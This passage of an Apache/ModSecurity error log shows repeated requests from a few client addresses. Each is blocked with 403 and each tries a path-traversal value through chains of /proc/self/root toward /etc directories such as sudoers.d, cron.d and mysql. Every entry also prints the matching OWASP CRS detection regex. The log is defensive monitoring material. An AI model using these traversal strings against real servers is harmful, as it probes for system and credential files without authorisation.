"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0h0vqxLDW4GITHUkTgmwAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:30:44.079285 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:46044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0h1Na6ubjKNq_cu4bOggAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:30:50.715342 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.243.128:46048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0h2gF0L0L-SsrnPo5iTwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:30:58.185681 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:45340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0h4vHIg5MgXLBnicPyRwAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:31:03.759069 2026] [:error] [pid 31215:tid 140411741927168] [client 74.7.243.128:34190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0h5wF0L0L-SsrnPo5iXgAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:31:36.802952 2026] [:error] [pid 7893:tid 140411574073088] [client 74.7.241.31:60564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iCBCii7xarUs8iHZhtQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 07:31:40.335154 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.241.31:57596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iDDJ3M9BSuKP7CAYUzgAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:31:42.591207 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.243.128:34196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iDta6ubjKNq_cu4bOxAAAA00"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:31:43.941986 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:39870] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iDxCii7xarUs8iHZhvwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:31:55.640326 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.243.128:39882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iG_XLqtnMIWvjpaKUjgAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:32:01.254365 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.243.128:49518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iIfHIg5MgXLBnicPyawAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:32:13.527004 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:48254] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iLda6ubjKNq_cu4bO1QAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:32:15.938924 2026] [:error] [pid 11642:tid 140411658000128] [client 74.7.243.128:39512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iL7ninkcc-iUj5ApZTQAAA4o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:32:22.709786 2026] [mime_magic:error] [pid 11642:tid 140411616036608] (70014)End of file found: [client 57.141.18.63:55266] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:32:23.602126 2026] [:error] [pid 21219:tid 140411674785536] [client 74.7.243.128:39518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iN_XLqtnMIWvjpaKUoQAAAog"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:32:29.346318 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:59956] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iPeoXxyEfFpUF8f975AAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:32:36.462729 2026] [mime_magic:error] [pid 7235:tid 140411607643904] (70014)End of file found: [client 216.73.216.191:56030] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 07:32:45.088084 2026] [:error] [pid 11642:tid 140411565680384] [client 74.7.243.128:55806] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iTbninkcc-iUj5ApZcgAAA5U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:32:50.940255 2026] [:error] [pid 31215:tid 140411658000128] [client 74.7.241.31:57598] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iUQF0L0L-SsrnPo5i7QAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:32:56.641261 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.241.31:38972] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iWAF0L0L-SsrnPo5i-gAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:32:56.901463 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.243.128:48444] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iWPXLqtnMIWvjpaKUwgAAAoY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:32:59.417932 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:57886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iW9a6ubjKNq_cu4bPBwAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 07:33:00.858515 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.241.31:58128] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iXPHIg5MgXLBnicPylgAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:33:01.781568 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:58716] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0iXfqxLDW4GITHUkTg_gAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
